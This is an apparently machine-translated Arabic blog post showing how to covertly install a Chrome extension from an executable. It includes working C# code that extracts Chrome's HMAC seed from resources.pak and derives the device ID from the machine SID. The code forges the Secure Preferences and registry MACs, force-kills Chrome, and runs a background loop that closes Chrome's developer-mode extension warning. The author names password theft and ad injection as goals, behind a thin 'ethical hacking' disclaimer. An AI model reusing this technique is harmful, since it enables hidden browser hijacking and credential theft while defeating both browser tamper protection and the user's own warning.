كروم العكسي والتمديد التثبيت

يوم جيد ، عزيزي القارئ! يتم تحديث Chrome ، ولكن لا توجد مقالات جديدة حول كيفية تثبيت إضافة برمجية في chrome ، إلى جانب - load-extension - ولكن هذا ليس خيارنا ، لأننا لا نبحث عن طرق سهلة. اليوم سوف أخبرك كيف من الممكن حقًا الحصول على كل شيء باستخدام تطبيق exe-shnik: كلمات المرور ، تغيير المحتوى ، كيفية السرقة ، إلخ. - ولكن هذه ليست دعوة للعمل ، ولكن فقط مقال للمراجعة. كل العصير تحت القص.

وهكذا ، ما الذي يسمح لنا بالقيام بالامتداد في وضع المطور؟ حسنًا ، مثل الامتداد العادي ، يمكن أن يعمل على جميع المواقع ، وعلى سبيل المثال ، كسر كلمات المرور ، وتنفيذ الإعلانات ، وما إلى ذلك. لكن الامتداد في وضع المطور يتيح الوصول إلى ميزة أخرى ، والتي يبدو أنها ليست مهمة للغاية ، ولكن يمكن أن تكون مفيدة: لدينا إمكانية الوصول إلى نظام الملفات. نعم ، سنطلق هذا الاستغلال من ملف exe ، ومن حيث المبدأ ، لسنا بحاجة إليه حقًا ، لكن ماذا لو؟

نحن نحلل الملفات

وهكذا ، بالنسبة للمبتدئين ، يمكنك معرفة الملفات التي ستختلف بعد تثبيت الامتداد ، يمكننا أن نجد أنها٪ appdata٪ \ .. \ Local \ Google \ Chrome \ User Data \ <profile> \ Secure Preferences. دعونا نسخ المحتويات ، وحذف التمديد واستعادة نسخة - بام هنا! والتوسع يعمل مرة أخرى. بالنظر إلى المعرف ، يمكنك أن ترى أن هناك قيمتين تتغير مع هذا المفتاح: extension.settings.id و protection.macs.extensions.settings.id - أولهما الإعدادات ، والثاني هو نوع من التجزئة. نحن نتسلق إلى الأنواع ونرى - هذا هو HMAC SHA256. ولكن ما الذي يحصل عليه من؟ دعنا ندخل في مصحح الأخطاء ، ونعلق على الكروم وتحميل الرموز من
https://chromium-browser-symsrv.commondatastorage.googleapis.com

اغتصاب الكروم

واو! نجد الملف pref_hash_calculator.cc ، التنزيل ، تعيين استراحة

 std::string PrefHashCalculator::Calculate(const std::string& path, const base::Value* value) const 

Op - نحصل على seed_ - مفتاح HMAC ، ونكتشف أيضًا أنه يسلسل ثلاثة خطوط ويأخذ النتيجة كـ HMACSHA256 (device_id + path + value ، seed_). حسنًا ، دعونا نلقي نظرة على بذورنا_ - وهنا تنتظرنا الحزينة الأولى: إنها مجرد سطر "ChromeRegistryHashStoreValidationSeed" - اسأل ، ما الخطأ في ذلك؟ ودعونا نلقي نظرة على نتيجة الحساب ، قارن بين التجزئة والتجزئة الناتجة في الملف على طول هذا المسار - نحن نشعر بخيبة أمل ، ولكن لا! الكلمة الأساسية في مفتاح "السجل" ، نحن نتسلق إلى السجل وننظر - وفي الحقيقة ، هذا هو مفتاح التجزئة في السجل ، وسنحتاجه.

الخصم ، debase ، وفي كل مكان هذا المفتاح فقط ، ما هو الخطأ؟ الآن دعونا نلقي نظرة على كم من الوقت يجب أن يكون مفتاح قياسي لـ HMACSHA256؟ 64 بايت ، وعلى الأرجح هذا ليس خطًا ، ولكن نوعًا ما من البايتات. الفرز؟ ليس لديك وقت! الافتراض الأول - البذرة _ يتم ترميزه في كل إصدار من chrome - دعونا نحاول فرز جميع الخيارات للبايت 64x على التوالي في الثنائيات وملفات chrome. نكتب نصًا بسيطًا ونحصل على النتيجة الأولى في غضون ساعة تقريبًا: تكمن بذورنا في resources.pak. دعونا جوجل الهيكل.



الإصدار 4 ، لدينا هو 5. هناك خطأ ما ، ربما لم يتغير الهيكل؟ لكن لا. بعد بعض المحاولات ، نحصل على أن البنية كما يلي: إصدار 4 بايت (5) ، 4 بايت - تشفير؟ (1) ، 2 بايت - عدد السجلات ، 2 بايت ، ليس من الواضح ماذا. فيما يلي الإدخالات بالتنسيق: 2 بايت - معرف ، 4 بايت - إزاحة نسبة إلى بداية الملف. نحن نبحث عن قسم بطول 64 بايت - ونعم ، لقد وجدناه ، هذه هي البذرة. الآن دعنا نكتب وظيفة للبحث عن seed_ in resources.pak لملف الإصدار الرابع والخامس:

 public static byte[] GetSeed(string resources_pak) { //Open stream using (FileStream fs = File.OpenRead(resources_pak)) using (BinaryReader reader = new BinaryReader(fs)) { // Read in all pairs. //4 bytes - Version (Assume, that is 5 or 4) int version = reader.ReadInt32(); int second_dword = reader.ReadInt32(); int count = 0; if (version == 0x05) { count = (reader.ReadUInt16()) + 1; reader.ReadUInt16(); } else { count = second_dword; //Skip useless byte reader.ReadByte(); } uint last_offset = (uint)(count) * 6 + (uint)fs.Position; for (int i = 0; i < count; i++) { //Word: ID uint id = (uint)reader.ReadInt16(); //DWord: Offset from file start uint offset = (reader.ReadUInt32()); //Assume, that seed_ is 64 bytes long if (offset - last_offset == 64) { //Save last position in file long last = fs.Position; //Go to section position fs.Seek(last_offset, SeekOrigin.Begin); //Allocate space uint want = offset - last_offset; byte[] u = new byte[want]; for (int o = 0; o < want; o++) u[o] = reader.ReadByte(); //Return carret back fs.Seek(last, SeekOrigin.Begin); return u; } last_offset = offset; } } return null; } 

حسنًا ، دعونا نغير الإعدادات ، ونحاول استبدال التجزئة - الفشل. أول شيء يمكنك أن تجده في أنواع الكروم هو إزالة كل الكائنات الفارغة من القيمة. حسنًا ، لقد قيل - تم.

فشل مرة أخرى - نحن بحاجة إلى إنشاء نفس HMACSHA256 من protection.macs كذلك ، يجب حذف المسار في هذه الحالة. عظيم! تلقى. لكننا نسينا تمامًا عن device_id - أين يمكنني الحصول عليه؟ في الإصدارات القديمة ، يكون هذا هو معرف الجهاز من بعض مكتبة RLZ لجهة خارجية. في الجديد ، فقط SID للكمبيوتر. كيف تحصل عليه؟ بالنسبة للخيار الثاني والإصدارات الجديدة من Chrome:

 public static string GetSID() { StringBuilder sb = new StringBuilder(260); int size = 260; GetComputerName(sb, ref size); byte[] Sid = null; uint cbSid = 0; string accountName = sb.ToString(); StringBuilder referencedDomainName = new StringBuilder(); uint cchReferencedDomainName = (uint)referencedDomainName.Capacity; SID_NAME_USE sidUse; int err = NO_ERROR; if (!LookupAccountName(null, accountName, Sid, ref cbSid, referencedDomainName, ref cchReferencedDomainName, out sidUse)) { err = Marshal.GetLastWin32Error(); if (err == ERROR_INSUFFICIENT_BUFFER || err == ERROR_INVALID_FLAGS) { Sid = new byte[cbSid]; referencedDomainName.EnsureCapacity((int)cchReferencedDomainName); err = NO_ERROR; if (!LookupAccountName(null, accountName, Sid, ref cbSid, referencedDomainName, ref cchReferencedDomainName, out sidUse)) err = Marshal.GetLastWin32Error(); } } else { // Consider throwing an exception since no result was found } if (err == 0) { if (!ConvertSidToStringSid(Sid, out IntPtr ptrSid)) { err = Marshal.GetLastWin32Error(); } else { string sidString = Marshal.PtrToStringAuto(ptrSid); LocalFree(ptrSid); return sidString; } } return null; } 

وللنسخة القديمة:

 public static string GetMachineId(string sid) { string dir = Environment.SystemDirectory; dir = dir.Substring(0, dir.IndexOf("\\") + 1); StringBuilder volname = new StringBuilder(261); StringBuilder fsname = new StringBuilder(261); uint sernum, maxlen; FileSystemFeature flags; if (!GetVolumeInformation(dir, volname, volname.Capacity, out sernum, out maxlen, out flags, fsname, fsname.Capacity)) Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error()); byte[] sid_str = (Hash(sid)); byte[] bts = new byte[sid_str.Length + 4]; for (int i = 0; i < sid_str.Length; i++) bts[i] = sid_str[i]; for (int i = 0; i < sizeof(int); i++) { int shift_bits = 8 * (sizeof(int) - i - 1); bts[sid_str.Length + i] = (byte)((sernum >> shift_bits) & 0xFF); } byte b = Crc8.Gen(bts); var sb = new StringBuilder(bts.Length + 1); foreach (byte bb in bts) sb.Append(bb.ToString("X2")); sb.Append(b.ToString("X2")); return sb.ToString(); } 

وهكذا ، يظل السخرية من الإعدادات وحفظ الملف ، مع إغلاق الكروم:

  public static void Install() { string path = Unzip(); string id = ""; string flags = "" + ((1 << 7) | (1 << 2)); string loc = "4"; id = "dblokgoogmhjemeebajnamjdmloolcjd"; string setting = "  "; preferences = SetValue(preferences, "extensions.settings." + id, setting.Replace("<", "\\u003C")); preferences = SetValue(preferences, "protection.macs.extensions.settings." + id, ComputeHash(seed_, "extensions.settings." + id, Serialize(JSONParser.ParseValue(typeof(object), setting)))); string abc = "HKEY_CURRENT_USER\\Software\\Google\\Chrome\\PreferenceMACs\\Default\\extensions.settings"; string reg_key = ComputeHash(Encoding.ASCII.GetBytes("ChromeRegistryHashStoreValidationSeed"), "extensions.settings." + id, Serialize(JSONParser.ParseValue(typeof(object), setting))); Registry.SetValue(abc, id, reg_key); string macs = GetSecure("protection.macs"); preferences = SetValue(preferences, "protection.super_mac", ComputeHash(seed_, "", macs)); Process process = new Process(); // Stop the process from opening a new window process.StartInfo.RedirectStandardOutput = true; process.StartInfo.UseShellExecute = false; process.StartInfo.CreateNoWindow = true; // Setup executable and parameters process.StartInfo.FileName = @"taskkill.exe"; process.StartInfo.Arguments = "/im chrome.exe /f"; // Go process.Start(); process.WaitForExit(); Thread.Sleep(150); File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences", preferences); } 

لاحظ أيضًا أنه عند فتح المتصفح الآن ، يتم فتح نافذة "تعطيل الإضافات في وضع المطور" - كيفية إغلاقها هي بالفعل اختيار الجميع. كيف يمكنني ترك دفق خلفي يؤدي إلى إغلاق هذه النافذة من خلال WinAPI:

 public static void CheckWindows() { while (true) { Process[] pcs = Process.GetProcessesByName("chrome"); if (pcs.Length > 0) { List<IntPtr> ww = GetChildWindows(IntPtr.Zero); foreach (var hwnd in ww) { try { uint pidd = 0; GetWindowThreadProcessId(hwnd, out pidd); IntPtr pid = (IntPtr)pidd; IntPtr hProcess = OpenProcess(0x0410, false, pidd); StringBuilder text = new StringBuilder(1000); GetModuleFileNameEx(hProcess, IntPtr.Zero, text, text.Capacity); CloseHandle(hProcess); if (!text.ToString().EndsWith("chrome.exe")) continue; const int nChars = 256; StringBuilder Buff = new StringBuilder(nChars); if (GetWindowText(hwnd, Buff, nChars) > 0) { string name = Buff.ToString(); if (names.Contains(name)) SendMessage((IntPtr)hwnd, WM_CLOSE, IntPtr.Zero, IntPtr.Zero); } Thread.Sleep(1); } catch { } Thread.Sleep(1); } } else Thread.Sleep(10); } } 

حظا سعيدا والاختراق الأخلاقي! من يعرف كيفية القيام بالشيء نفسه مع متصفح Yandex - سيكون من المثير للاهتمام معرفة ما إذا كنت أحاول التقاطه لمدة أسبوع الآن ، فهو لا يعمل.